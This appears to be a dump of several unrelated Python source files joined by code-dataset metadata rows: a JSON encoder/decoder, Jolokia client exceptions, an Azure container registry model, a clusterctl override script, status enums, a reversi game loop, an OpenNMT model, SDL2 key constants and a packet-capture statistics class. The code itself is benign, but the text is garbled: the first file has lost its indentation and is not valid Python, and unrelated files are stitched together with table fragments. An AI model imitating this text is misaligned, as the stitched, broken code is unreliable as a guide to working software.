if (c == ''):
            raise JSONError(E_TRUNC, stm, pos)
elif (c == ']'):
stm.next()
return result
elif (c == ','):
stm.next()
result.append(_from_json_raw(stm))
continue
elif (not result):
result.append(_from_json_raw(stm))
continue
else:
            raise JSONError(E_MALF, stm, stm.pos)
def _from_json_dict(stm):
stm.next()
result = {}
expect_key = 0
pos = stm.pos
while True:
stm.skipspaces()
c = stm.peek()
if (c == ''):
            raise JSONError(E_TRUNC, stm, pos)
if (c in ('}', ',')):
stm.next()
if expect_key:
                raise JSONError(E_DKEY, stm, stm.pos)
if (c == '}'):
return result
expect_key = 1
continue
elif (c == '"'):
key = _from_json_string(stm)
stm.skipspaces()
c = stm.next()
if (c != ':'):
                raise JSONError(E_COLON, stm, stm.pos)
stm.skipspaces()
val = _from_json_raw(stm)
result[key] = val
expect_key = 0
continue
        raise JSONError(E_MALF, stm, stm.pos)
def _from_json_raw(stm):
while True:
stm.skipspaces()
c = stm.peek()
if (c == '"'):
return _from_json_string(stm)
elif (c == '{'):
return _from_json_dict(stm)
elif (c == '['):
return _from_json_list(stm)
elif (c == 't'):
return _from_json_fixed(stm, 'true', True, E_BOOL)
elif (c == 'f'):
return _from_json_fixed(stm, 'false', False, E_BOOL)
elif (c == 'n'):
return _from_json_fixed(stm, 'null', None, E_NULL)
elif (c in NUMSTART):
return _from_json_number(stm)
    raise JSONError(E_MALF, stm, stm.pos)
def from_json(data):
"\n Converts 'data' which is UTF-8 (or the 7-bit pure ASCII subset) into\n a Python representation. You must pass bytes to this in a str type,\n not unicode.\n "
if (not isinstance(data, str)):
        raise JSONError(E_BYTES)
if (not data):
return None
stm = JSONStream(data)
return _from_json_raw(stm)
def _to_json_list(stm, lst):
seen = 0
stm.write('[')
for elem in lst:
if seen:
stm.write(',')
seen = 1
_to_json_object(stm, elem)
stm.write(']')
def _to_json_string(stm, buf):
stm.write('"')
for c in buf:
nc = REV_ESC_MAP.get(c, None)
if nc:
stm.write('\\' + nc)
elif (ord(c) <= 127):
stm.write(str(c))
else:
stm.write('\\u%04x' % ord(c))
stm.write('"')
def _to_json_dict(stm, dct):
seen = 0
stm.write('{')
for key in dct.keys():
if seen:
stm.write(',')
seen = 1
val = dct[key]
if (not (type(key) in (types.StringType, types.UnicodeType))):
key = str(key)
_to_json_string(stm, key)
stm.write(':')
_to_json_object(stm, val)
stm.write('}')
def _to_json_object(stm, obj):
if isinstance(obj, (types.ListType, types.TupleType)):
_to_json_list(stm, obj)
elif isinstance(obj, types.BooleanType):
if obj:
stm.write('true')
else:
stm.write('false')
elif isinstance(obj, types.FloatType):
if (not (NEG_INF < obj < POS_INF)):
            raise JSONError(E_BADFLOAT % obj)
stm.write('%s' % obj)
elif isinstance(obj, (types.IntType, types.LongType)):
stm.write('%d' % obj)
elif isinstance(obj, types.NoneType):
stm.write('null')
elif isinstance(obj, (types.StringType, types.UnicodeType)):
_to_json_string(stm, obj)
elif (hasattr(obj, 'keys') and hasattr(obj, '__getitem__')):
_to_json_dict(stm, obj)
elif hasattr(obj, '__unicode__'):
_to_json_string(stm, obj.__unicode__())
elif hasattr(obj, '__str__'):
_to_json_string(stm, obj.__str__())
else:
        raise JSONError(E_UNSUPP % type(obj))
def to_json(obj):
"\n Converts 'obj' to an ASCII JSON string representation.\n "
stm = StringIO.StringIO('')
_to_json_object(stm, obj)
return stm.getvalue()
decode = from_json
encode = to_json
| 27.885906 | 178 | 0.526354 |
4a257da54ffc485c8a9cf6c68bfb81426d784fae | 558 | py | Python | jolokia/exceptions.py | minsis/python-jolokia | 10d275b8507fec4ea340b112864c7e6068540e58 | [
"Apache-2.0"
] | null | null | null | jolokia/exceptions.py | minsis/python-jolokia | 10d275b8507fec4ea340b112864c7e6068540e58 | [
"Apache-2.0"
] | null | null | null | jolokia/exceptions.py | minsis/python-jolokia | 10d275b8507fec4ea340b112864c7e6068540e58 | [
"Apache-2.0"
] | null | null | null | """Custom exceptions for for various modules in Jolokia Python client"""
class UrlNotSpecifiedException(Exception):
"""Indicates that Jolokia agent URL has not been provided"""
pass
class MalformedUrlException(Exception):
"""Indicates that the Jolokia agent URL is malformed"""
pass
class IllegalArgumentException(Exception):
"""Generic exception for enforcing required arguments"""
pass
class MissingEnvironmentVariableException(Exception):
"""Should be thrown when expected environment variable is not found"""
pass
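def _require_agent_url(url):
    """Minimal sketch (added for illustration) of how a client might raise
    these exceptions; the validation rules here are assumptions."""
    if not url:
        raise UrlNotSpecifiedException('a Jolokia agent URL is required')
    if not url.startswith(('http://', 'https://')):
        raise MalformedUrlException('unsupported agent URL: %r' % url)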
| 25.363636 | 74 | 0.75448 |
4a257e6247d44b7cd16c58b7f104a309577b31af | 2,616 | py | Python | azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2018_09_01/models/task_update_parameters_py3.py | NMijat1024/azure-sdk-for-python | c49e1d6d797dceaca81813cafb1a486d67185182 | [
"MIT"
] | null | null | null | azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2018_09_01/models/task_update_parameters_py3.py | NMijat1024/azure-sdk-for-python | c49e1d6d797dceaca81813cafb1a486d67185182 | [
"MIT"
] | 1 | 2018-11-29T14:46:42.000Z | 2018-11-29T14:46:42.000Z | azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2018_09_01/models/task_update_parameters_py3.py | NMijat1024/azure-sdk-for-python | c49e1d6d797dceaca81813cafb1a486d67185182 | [
"MIT"
] | 1 | 2018-08-28T14:36:47.000Z | 2018-08-28T14:36:47.000Z |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class TaskUpdateParameters(Model):
"""The parameters for updating a task.
:param status: The current status of task. Possible values include:
'Disabled', 'Enabled'
:type status: str or
~azure.mgmt.containerregistry.v2018_09_01.models.TaskStatus
:param platform: The platform properties against which the run has to
happen.
:type platform:
~azure.mgmt.containerregistry.v2018_09_01.models.PlatformUpdateParameters
:param agent_configuration: The machine configuration of the run agent.
:type agent_configuration:
~azure.mgmt.containerregistry.v2018_09_01.models.AgentProperties
:param timeout: Run timeout in seconds.
:type timeout: int
:param step: The properties for updating a task step.
:type step:
~azure.mgmt.containerregistry.v2018_09_01.models.TaskStepUpdateParameters
:param trigger: The properties for updating trigger properties.
:type trigger:
~azure.mgmt.containerregistry.v2018_09_01.models.TriggerUpdateParameters
:param tags: The ARM resource tags.
:type tags: dict[str, str]
"""
_attribute_map = {
'status': {'key': 'properties.status', 'type': 'str'},
'platform': {'key': 'properties.platform', 'type': 'PlatformUpdateParameters'},
'agent_configuration': {'key': 'properties.agentConfiguration', 'type': 'AgentProperties'},
'timeout': {'key': 'properties.timeout', 'type': 'int'},
'step': {'key': 'properties.step', 'type': 'TaskStepUpdateParameters'},
'trigger': {'key': 'properties.trigger', 'type': 'TriggerUpdateParameters'},
'tags': {'key': 'tags', 'type': '{str}'},
}
def __init__(self, *, status=None, platform=None, agent_configuration=None, timeout: int=None, step=None, trigger=None, tags=None, **kwargs) -> None:
super(TaskUpdateParameters, self).__init__(**kwargs)
self.status = status
self.platform = platform
self.agent_configuration = agent_configuration
self.timeout = timeout
self.step = step
self.trigger = trigger
self.tags = tags
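def _example_parameters():
    # Illustrative only (not generated SDK code): builds a minimal update
    # payload; every value below is a placeholder.
    return TaskUpdateParameters(status='Enabled', timeout=3600,
                                tags={'env': 'dev'})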
| 43.6 | 153 | 0.655581 |
4a257f3bb55c6b0f3b0e9b1d09fab92cd787b206 | 1,865 | py | Python | utilities/scm_enums.py | daotranminh/SCM | 6681a49999cbd089032e25a441572e9a1f166897 | [
"MIT"
] | null | null | null | utilities/scm_enums.py | daotranminh/SCM | 6681a49999cbd089032e25a441572e9a1f166897 | [
"MIT"
] | null | null | null | utilities/scm_enums.py | daotranminh/SCM | 6681a49999cbd089032e25a441572e9a1f166897 | [
"MIT"
] | null | null | null |
from enum import IntEnum
class ErrorCodes(IntEnum):
SUCCESS = 0
ERROR_ADD_MATERIAL_FAILED = 1
ERROR_ADD_MATERIAL_VERSION_FAILED = 2
ERROR_ADD_CUSTOMER_FAILED = 3
ERROR_ADD_TASTE_FAILED = 4
ERROR_ADD_TOPIC_FAILED = 5
ERROR_UPDATE_TOPIC_FAILED = 6
ERROR_ADD_MATERIAL_SUBFORMULA_FAILED = 7
ERROR_ADD_SUBFORMULA_FAILED = 8
    ERROR_ADD_DECORATION_FAILED = 9
ERROR_ADD_DECORATION_FORM_FAILED = 10
ERROR_ADD_DECORATION_TECHNIQUE_FAILED = 11
ERROR_ADD_DECORATION_TEMPLATE_PATH_FAILED = 12
ERROR_ADD_ORDER_FAILED = 13
ERROR_ADD_SAMPLE_IMAGE_PATH_FAILED = 14
ERROR_DELETE_SAMPLE_IMAGE_PATH_FAILED = 15
ERROR_ADD_SAMPLE_IMAGES_GROUP_FAILED = 16
ERROR_DELETE_SAMPLE_IMAGES_GROUP_FAILED = 17
ERROR_ADD_PRODUCT_FAILED = 18
ERROR_ADD_PRODUCT_IMAGE_PATH_FAILED = 19
ERROR_DELETE_PRODUCT_FAILED = 20
ERROR_ORDER_STATUS_KEY_NOT_EXIST = 21
ERROR_PAYMENT_STATUS_KEY_NOT_EXIST = 22
ERROR_ADD_MATERIAL_VERSION_COST_ESTIMATION_FAILED = 23
ERROR_ADD_COST_ESTIMATION_FAILED = 24
ERROR_ADD_FORMULA_FAILED = 25
ERROR_ADD_FORMULA_SUBFORMULA_FAILED = 26
ERROR_ADD_PRODUCT_COST_ESTIMATION_FAILED = 27
ERROR_ADD_FIXED_MATERIAL_SUBFORMULA_FAILED = 28
ERROR_ADD_FIXED_SUBFORMULA_FAILED = 29
ERROR_ADD_FIXED_FORMULA_FAILED = 30
ERROR_ADD_PLATE_FAILED = 31
ERROR_ADD_BOX_FAILED = 32
ERROR_ADD_FIXED_PLATE_FAILED = 33
ERROR_ADD_FIXED_BOX_FAILED = 34
class PaymentStatus(IntEnum):
NOT_PAID = 0
PARTLY_PAID = 1
FULLY_PAID = 2
class BoxStatus(IntEnum):
BOX_NOT_NEEDED_TO_BE_RETURNED = 0
BOX_WITH_PRODUCT_IN_PRODUCTION = 1
BOX_AT_CUSTOMER_AFTER_DELIVERY = 2
BOX_RETURNED = 3
class OrderStatus(IntEnum):
PENDING = 0
IN_PRODUCTION = 1
DELIVERED = 2
class SubFormulaTypes(IntEnum):
BASE = 0
FILLING = 1
CREAM = 2
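# IntEnum members compare equal to plain ints, which keeps database rows and
# API payloads simple (illustrative):
#   PaymentStatus.FULLY_PAID == 2        # True
#   ErrorCodes(0) is ErrorCodes.SUCCESS  # True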
| 30.57377 | 58 | 0.775335 |
4a257f40bfc1b2f7260b0bfba29fc7e221bfb4fd | 6,942 | py | Python | cmd/clusterctl/hack/local-overrides.py | colinlodter/cluster-api | 3c4dff9e48320437fa7a205ee23c143f27cf52eb | [
"Apache-2.0"
] | null | null | null | cmd/clusterctl/hack/local-overrides.py | colinlodter/cluster-api | 3c4dff9e48320437fa7a205ee23c143f27cf52eb | [
"Apache-2.0"
] | null | null | null | cmd/clusterctl/hack/local-overrides.py | colinlodter/cluster-api | 3c4dff9e48320437fa7a205ee23c143f27cf52eb | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2020 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###################
# local-overrides.py takes in input a list of provider and, for each of them, generates the components YAML from the
# local repositories (the GitHub repositories clone), and finally stores it in the clusterctl local override folder
# prerequisites:
# - the script should be executed from sigs.k8s.io/cluster-api/ by calling cmd/clusterctl/hack/local-overrides.py
# - there should be a sigs.k8s.io/cluster-api/clusterctl-settings.json file with the list of provider for which
# the local overrides should be generated and the list of provider repositories to be included (on top of cluster-api).
# {
# "providers": [ "cluster-api", "kubeadm-bootstrap", "aws"],
# "provider_repos": ["../cluster-api-provider-aws"]
# }
# - for each additional provider repository there should be a sigs.k8s.io/<provider_repo>/clusterctl-settings.json file e.g.
# {
# "name": "aws",
# "config": {
# "componentsFile": "infrastructure-components.yaml",
# "nextVersion": "v0.5.0",
# "type": "InfrastructureProvider"
# }
###################
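# Illustrative effect with the default settings below: the script writes files
# such as ~/.cluster-api/overrides/cluster-api/v0.3.0/core-components.yaml and
# prints a command along the lines of
#   clusterctl init --core cluster-api:v0.3.0 --bootstrap kubeadm-bootstrap:v0.3.0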
from __future__ import unicode_literals
import json
import subprocess
import os
import errno
import sys
settings = {}
providers = {
'cluster-api': {
'componentsFile': 'core-components.yaml',
'nextVersion': 'v0.3.0',
'type': 'CoreProvider',
},
'kubeadm-bootstrap': {
'componentsFile': 'bootstrap-components.yaml',
'nextVersion': 'v0.3.0',
'type': 'BootstrapProvider',
'configFolder': 'bootstrap/kubeadm/config/default',
},
'docker': {
'componentsFile': 'infrastructure-components.yaml',
'nextVersion': 'v0.3.0',
'type': 'InfrastructureProvider',
'configFolder': 'test/infrastructure/docker/config/default',
},
}
validTypes = ['CoreProvider','BootstrapProvider','InfrastructureProvider']
def load_settings():
global settings
try:
settings = json.load(open('clusterctl-settings.json'))
except Exception as e:
raise Exception('failed to load clusterctl-settings.json: {}'.format(e))
def load_providers():
provider_repos = settings.get('provider_repos', [])
for repo in provider_repos:
file = repo + '/clusterctl-settings.json'
try:
provider_details = json.load(open(file))
provider_name = provider_details['name']
provider_config = provider_details['config']
provider_config['repo'] = repo
providers[provider_name] = provider_config
except Exception as e:
raise Exception('failed to load clusterctl-settings.json from repo {}: {}'.format(repo, e))
def execCmd(args):
try:
out = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = out.communicate()
if stderr is not None:
raise Exception('stderr contains: \n{}'.format(stderr))
return stdout
except Exception as e:
raise Exception('failed to run {}: {}'.format(args, e))
def get_home():
return os.path.expanduser('~')
def write_local_override(provider, version, components_file, components_yaml):
try:
home = get_home()
overrides_folder = os.path.join(home, '.cluster-api', 'overrides')
provider_overrides_folder = os.path.join(overrides_folder, provider, version)
try:
os.makedirs(provider_overrides_folder)
except OSError as e:
if e.errno != errno.EEXIST:
raise
f = open(os.path.join(provider_overrides_folder, components_file), 'wb')
f.write(components_yaml)
f.close()
except Exception as e:
raise Exception('failed to write {} to {}: {}'.format(components_file, provider_overrides_folder, e))
def create_local_overrides():
providerList = settings.get('providers', [])
assert providerList is not None, 'invalid configuration: please define the list of providers to override'
assert len(providerList)>0, 'invalid configuration: please define at least one provider to override'
for provider in providerList:
p = providers.get(provider)
assert p is not None, 'invalid configuration: please specify the configuration for the {} provider'.format(provider)
repo = p.get('repo', '.')
config_folder = p.get('configFolder', 'config/default')
next_version = p.get('nextVersion')
assert next_version is not None, 'invalid configuration for provider {}: please provide nextVersion value'.format(provider)
type = p.get('type')
assert type is not None, 'invalid configuration for provider {}: please provide type value'.format(provider)
assert type in validTypes, 'invalid configuration for provider {}: please use one of {}'.format(provider, ', '.join(validTypes))
components_file = p.get('componentsFile')
assert components_file is not None, 'invalid configuration for provider {}: please provide componentsFile value'.format(provider)
components_yaml = execCmd(['kustomize', 'build', os.path.join(repo, config_folder)])
write_local_override(provider, next_version, components_file, components_yaml)
yield provider, type, next_version
def CoreProviderFlag():
return '--core'
def BootstrapProviderFlag():
return '--bootstrap'
def InfrastructureProviderFlag():
return '--infrastructure'
def type_to_flag(type):
switcher = {
'CoreProvider': CoreProviderFlag,
'BootstrapProvider': BootstrapProviderFlag,
'InfrastructureProvider': InfrastructureProviderFlag
}
func = switcher.get(type, lambda: 'Invalid type')
return func()
def print_instructions(overrides):
providerList = settings.get('providers', [])
print ('clusterctl local overrides generated from local repositories for the {} providers.'.format(', '.join(providerList)))
print ('in order to use them, please run:')
print
cmd = 'clusterctl init'
for provider, type, next_version in overrides:
cmd += ' {} {}:{}'.format(type_to_flag(type), provider, next_version)
print (cmd)
print
load_settings()
load_providers()
overrides = create_local_overrides()
print_instructions(overrides)
| 36.34555 | 137 | 0.673581 |
4a257f6cfaaf937edd2f7e4a2744ee5a99463e05 | 1,051 | py | Python | src/battle_CUI.py | srpkdyy/reversi | 93977f1d1787e78e80a3fecb6753747ba3eed979 | [
"MIT"
] | null | null | null | src/battle_CUI.py | srpkdyy/reversi | 93977f1d1787e78e80a3fecb6753747ba3eed979 | [
"MIT"
] | null | null | null | src/battle_CUI.py | srpkdyy/reversi | 93977f1d1787e78e80a3fecb6753747ba3eed979 | [
"MIT"
] | null | null | null | from envs.board import Board
from agents.human import Human
from agents.randomer import Randomer
def main():
field = Board()
field.render()
#player1 = Human()
player1 = Randomer()
player2 = Randomer()
#player2 = Human()
players = (player1, player2)
field.setup_player(player1)
field.setup_player(player2)
turn = 0
while not field.is_game_set():
player = players[turn%2]
color = player.get_piece_color()
turn += 1
if not field.exist_legal_move(color):
continue
player.update(field.get_board_state())
        # keep asking the player until a legal position is chosen
        put_pos = player.move()
        while not field.can_be_put(color, put_pos):
            put_pos = player.move()
field.put_a_piece(color, put_pos)
field.render()
winner, n_black, n_white, last_field = field.get_game_result()
    print(winner + ' is the winner.')
print('black:' + str(n_black))
print('white:' + str(n_white))
print(last_field)
if __name__ == '__main__':
main()
| 21.44898 | 66 | 0.597526 |
4a25804993fbb63265dd3676581c6547134a169d | 622 | py | Python | leetcode-python/num001.py | shuaizi/leetcode | c943410575f380a00335bf5ac8d361af53a92d78 | [
"Apache-2.0"
] | null | null | null | leetcode-python/num001.py | shuaizi/leetcode | c943410575f380a00335bf5ac8d361af53a92d78 | [
"Apache-2.0"
] | null | null | null | leetcode-python/num001.py | shuaizi/leetcode | c943410575f380a00335bf5ac8d361af53a92d78 | [
"Apache-2.0"
] | null | null | null | __author__ = 'shuai'
class Solution(object):
def twoSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
        for i in range(len(nums) - 1):
            for j in range(i + 1, len(nums)):
                if nums[i] + nums[j] == target:
                    # return the indices, matching twoSum2 and the List[int] return type
                    return [i, j]
def twoSum2(self, nums, target):
dic = {}
for i in range(len(nums)):
if target - nums[i] in dic:
return [i, dic[target - nums[i]]]
dic[nums[i]] = i
sol = Solution()
sol.twoSum([2, 7, 11, 15], 9)
| 25.916667 | 49 | 0.466238 |
4a25807d9b3fd18292d98ba58abd64f0c19852ad | 1,931 | py | Python | onmt/models/model.py | kanghj/OpenNMT-py | 759d5b5a663ee8de3da781ba57f19b3873024753 | [
"MIT"
] | null | null | null | onmt/models/model.py | kanghj/OpenNMT-py | 759d5b5a663ee8de3da781ba57f19b3873024753 | [
"MIT"
] | null | null | null | onmt/models/model.py | kanghj/OpenNMT-py | 759d5b5a663ee8de3da781ba57f19b3873024753 | [
"MIT"
] | null | null | null | """ Onmt NMT Model base class definition """
import torch.nn as nn
class NMTModel(nn.Module):
"""
Core trainable object in OpenNMT. Implements a trainable interface
for a simple, generic encoder + decoder model.
Args:
encoder (:obj:`EncoderBase`): an encoder object
decoder (:obj:`RNNDecoderBase`): a decoder object
"""
def __init__(self, encoder, decoder):
super(NMTModel, self).__init__()
self.encoder = encoder
self.decoder = decoder
def forward(self, src, tgt, lengths, bptt=False):
"""Forward propagate a `src` and `tgt` pair for training.
        Possibly initialized with a beginning decoder state.
Args:
src (:obj:`Tensor`):
a source sequence passed to encoder.
typically for inputs this will be a padded :obj:`LongTensor`
of size `[len x batch x features]`. however, may be an
image or other generic input depending on encoder.
tgt (:obj:`LongTensor`):
a target sequence of size `[tgt_len x batch]`.
lengths(:obj:`LongTensor`): the src lengths, pre-padding `[batch]`.
bptt (:obj:`Boolean`):
a flag indicating if truncated bptt is set. If reset then
init_state
Returns:
(:obj:`FloatTensor`, `dict`, :obj:`onmt.Models.DecoderState`):
* decoder output `[tgt_len x batch x hidden]`
* dictionary attention dists of `[tgt_len x batch x src_len]`
"""
tgt = tgt[:-1] # exclude last target from inputs
enc_state, memory_bank, lengths = self.encoder(src, lengths)
if bptt is False:
self.decoder.init_state(src, memory_bank, enc_state)
dec_out, attns = self.decoder(tgt, memory_bank,
memory_lengths=lengths)
return dec_out, attns
| 37.862745 | 79 | 0.58985 |
4a2581fc941294530b98a445ee1e897c468d04e8 | 2,159 | py | Python | moderngl_window/context/sdl2/keys.py | minuJeong/moderngl-window | 6386478f1e6b07cefda8f4d9324d972ab88b34ec | [
"MIT"
] | null | null | null | moderngl_window/context/sdl2/keys.py | minuJeong/moderngl-window | 6386478f1e6b07cefda8f4d9324d972ab88b34ec | [
"MIT"
] | null | null | null | moderngl_window/context/sdl2/keys.py | minuJeong/moderngl-window | 6386478f1e6b07cefda8f4d9324d972ab88b34ec | [
"MIT"
] | null | null | null | # flake8: noqa E741
import sdl2
from moderngl_window.context.base import BaseKeys
class Keys(BaseKeys):
"""
Namespace mapping SDL2 specific key constants
"""
ACTION_PRESS = sdl2.SDL_KEYDOWN
ACTION_RELEASE = sdl2.SDL_KEYUP
ESCAPE = sdl2.SDLK_ESCAPE
SPACE = sdl2.SDLK_SPACE
ENTER = sdl2.SDLK_RETURN
PAGE_UP = sdl2.SDLK_PAGEUP
PAGE_DOWN = sdl2.SDLK_PAGEDOWN
LEFT = sdl2.SDLK_LEFT
RIGHT = sdl2.SDLK_RIGHT
UP = sdl2.SDLK_UP
DOWN = sdl2.SDLK_DOWN
TAB = sdl2.SDLK_TAB
COMMA = sdl2.SDLK_COMMA
MINUS = sdl2.SDLK_MINUS
PERIOD = sdl2.SDLK_PERIOD
SLASH = sdl2.SDLK_SLASH
SEMICOLON = sdl2.SDLK_SEMICOLON
EQUAL = sdl2.SDLK_EQUALS
LEFT_BRACKET = sdl2.SDLK_LEFTBRACKET
RIGHT_BRACKET = sdl2.SDLK_RIGHTBRACKET
BACKSLASH = sdl2.SDLK_BACKSLASH
BACKSPACE = sdl2.SDLK_BACKSPACE
INSERT = sdl2.SDLK_INSERT
DELETE = sdl2.SDLK_DELETE
HOME = sdl2.SDLK_HOME
END = sdl2.SDLK_END
CAPS_LOCK = sdl2.SDLK_CAPSLOCK
F1 = sdl2.SDLK_F1
F2 = sdl2.SDLK_F2
F3 = sdl2.SDLK_F3
F4 = sdl2.SDLK_F4
F5 = sdl2.SDLK_F5
F6 = sdl2.SDLK_F6
F7 = sdl2.SDLK_F7
F8 = sdl2.SDLK_F8
F9 = sdl2.SDLK_F9
F10 = sdl2.SDLK_F10
F11 = sdl2.SDLK_F11
F12 = sdl2.SDLK_F12
NUMBER_0 = sdl2.SDLK_0
NUMBER_1 = sdl2.SDLK_1
NUMBER_2 = sdl2.SDLK_2
NUMBER_3 = sdl2.SDLK_3
NUMBER_4 = sdl2.SDLK_4
NUMBER_5 = sdl2.SDLK_5
NUMBER_6 = sdl2.SDLK_6
NUMBER_7 = sdl2.SDLK_7
NUMBER_8 = sdl2.SDLK_8
NUMBER_9 = sdl2.SDLK_9
A = sdl2.SDLK_a
B = sdl2.SDLK_b
C = sdl2.SDLK_c
D = sdl2.SDLK_d
E = sdl2.SDLK_e
F = sdl2.SDLK_f
G = sdl2.SDLK_g
H = sdl2.SDLK_h
I = sdl2.SDLK_i
J = sdl2.SDLK_j
K = sdl2.SDLK_k
L = sdl2.SDLK_l
M = sdl2.SDLK_m
N = sdl2.SDLK_n
O = sdl2.SDLK_o
P = sdl2.SDLK_p
Q = sdl2.SDLK_q
R = sdl2.SDLK_r
S = sdl2.SDLK_s
T = sdl2.SDLK_t
U = sdl2.SDLK_u
V = sdl2.SDLK_v
W = sdl2.SDLK_w
X = sdl2.SDLK_x
Y = sdl2.SDLK_y
Z = sdl2.SDLK_z
| 23.725275 | 50 | 0.621121 |
4a25823b958cf34775ee722649353a1de7e89270 | 396 | py | Python | mi/types/bot.py | gitter-badger/Mi.py | ef6611c93c8a5237ec9d51ff89e845b85771e070 | [
"MIT"
] | 13 | 2021-09-14T02:47:23.000Z | 2022-02-27T16:48:09.000Z | mi/types/bot.py | gitter-badger/Mi.py | ef6611c93c8a5237ec9d51ff89e845b85771e070 | [
"MIT"
] | 62 | 2021-08-28T10:56:55.000Z | 2022-03-30T06:47:28.000Z | mi/types/bot.py | gitter-badger/Mi.py | ef6611c93c8a5237ec9d51ff89e845b85771e070 | [
"MIT"
] | 3 | 2021-12-23T20:10:57.000Z | 2022-03-30T13:19:49.000Z | from abc import ABC, abstractmethod
from typing import Any, Dict, Optional
class AbstractBotBase(ABC):
@abstractmethod
async def dispatch(self, event_name: Optional[str] = None, *args: tuple[Any], **kwargs: Dict[Any, Any]):
pass
@abstractmethod
async def event_dispatch(self, event_name: Optional[str] = None, *args: tuple[Any], **kwargs: Dict[Any, Any]):
pass
| 30.461538 | 114 | 0.686869 |
4a2582f160a80b3740fa3a3c0dd02621d7bb623a | 21,609 | py | Python | src/PacketCapture.py | sanaakhelloqi/pcapstats | a4135948ec345c46cc20b21c2b1a870df8cafa7e | [
"Apache-2.0"
] | null | null | null | src/PacketCapture.py | sanaakhelloqi/pcapstats | a4135948ec345c46cc20b21c2b1a870df8cafa7e | [
"Apache-2.0"
] | null | null | null | src/PacketCapture.py | sanaakhelloqi/pcapstats | a4135948ec345c46cc20b21c2b1a870df8cafa7e | [
"Apache-2.0"
] | null | null | null | import libs.mlvideos as mlvideos
from src.datamodel.Packet import Packets
from typing import List, Union
from decimal import Decimal
from pathlib import Path
import math
import collections
import pandas as pd
import numpy as np
from scipy import stats
import networkx as nx
class PacketCapture:
def __init__(self, file: Path, packets: Packets):
self.file = file
self.packets = packets.get_packets()
self.stats = {"Deltas": {},
"Lengths": {},
"Arrival times": {}}
self.features = {}
self.graph_representation = None
self.deltas = None
self.times = self.get_times()
self.lengths = self.get_lengths()
self.total_length = self.get_total_length()
self.packets_count = self.get_packets_count()
self.list_of_tuple_src_dst = self.get_list_of_tuple_src_dst()
self.set_of_all_ip_addr = self.get_set_of_all_ip_addr()
def get_list_of_tuple_src_dst(self):
return [(pkt.srcIp, pkt.dstIp) for pkt in self.packets]
def get_times(self) -> List[Decimal]:
"""returns a list of arrival time of packets
"""
return [pkt.time for pkt in self.packets]
def get_lengths(self) -> List[int]:
"""returns a list of length of packets
"""
return [pkt.length for pkt in self.packets]
def get_total_length(self):
"""returns the total length of packets in kbit
"""
total_length = 0
for pkt in self.packets:
total_length += pkt.length
return self.byte_to_kbit(Decimal(total_length))
def get_packets_count(self):
"""returns the packets count
"""
return len(self.get_times())
def calc_deltas(self, start=Decimal(0), end=Decimal(0)):
mlvideos.normalize_times_from_times(self.times)
end = self.times[-1] if end == Decimal(0) else end
times_ = [i for i in self.times if start <= i <= end]
self.deltas = list([float(delta) for delta in mlvideos.get_deltas_from_times(times_)])
def get_deltas(self) -> List[float]:
if not self.deltas:
self.calc_deltas()
return self.deltas
    # Each getter lazily computes the deltas, then records the statistic.
    def get_deltas_count(self):
        if not self.deltas:
            self.calc_deltas()
        self.stats["Deltas"]["count"] = float(pd.Series(self.deltas).count())
    def get_deltas_mean(self):
        if not self.deltas:
            self.calc_deltas()
        self.stats["Deltas"]["mean"] = float(pd.Series(self.deltas).mean())
    def get_deltas_std(self):
        if not self.deltas:
            self.calc_deltas()
        self.stats["Deltas"]["std"] = float(pd.Series(self.deltas).std())
    def get_deltas_min(self):
        if not self.deltas:
            self.calc_deltas()
        self.stats["Deltas"]["min"] = float(pd.Series(self.deltas).min())
    def get_deltas_max(self):
        if not self.deltas:
            self.calc_deltas()
        self.stats["Deltas"]["max"] = float(pd.Series(self.deltas).max())
    def get_deltas_variance(self):
        if not self.deltas:
            self.calc_deltas()
        self.stats["Deltas"]["variance"] = float(np.var(self.deltas))
    def get_deltas_variance_coefficient(self):
        if not self.deltas:
            self.calc_deltas()
        self.stats["Deltas"]["variance_coefficient"] = float(np.std(self.deltas) / np.mean(self.deltas))
    def get_deltas_mode(self):
        if not self.deltas:
            self.calc_deltas()
        self.stats["Deltas"]["mode"] = float(stats.mode(self.deltas)[0])
    def get_deltas_kurtosis(self):
        if not self.deltas:
            self.calc_deltas()
        self.stats["Deltas"]["kurtosis"] = float(stats.mstats.kurtosis(self.deltas))
    def get_deltas_skewness(self):
        if not self.deltas:
            self.calc_deltas()
        self.stats["Deltas"]["skewness"] = float(stats.skew(self.deltas))
    def get_deltas_median(self):
        if not self.deltas:
            self.calc_deltas()
        self.stats["Deltas"]["median"] = float(np.median(self.deltas))
def get_lengths_count(self):
self.stats["Lengths"]["count"] = float(pd.Series(self.lengths).count())
def get_lengths_mean(self):
self.stats["Lengths"]["mean"] = float(pd.Series(self.lengths).mean())
def get_lengths_std(self):
self.stats["Lengths"]["std"] = float(pd.Series(self.lengths).std())
def get_lengths_min(self):
self.stats["Lengths"]["min"] = float(pd.Series(self.lengths).min())
def get_lengths_max(self):
self.stats["Lengths"]["max"] = float(pd.Series(self.lengths).max())
def get_lengths_variance(self):
self.stats["Lengths"]["variance"] = float(np.var(self.lengths))
def get_lengths_variance_coefficient(self):
self.stats["Lengths"]["variance_coefficient"] = float(np.std(self.lengths) / np.mean(self.lengths))
def get_lengths_mode(self):
self.stats["Lengths"]["mode"] = float(stats.mode(self.lengths)[0])
def get_lengths_kurtosis(self):
self.stats["Lengths"]["kurtosis"] = float(stats.mstats.kurtosis(self.lengths))
def get_lengths_skewness(self):
self.stats["Lengths"]["skewness"] = float(stats.skew(self.lengths))
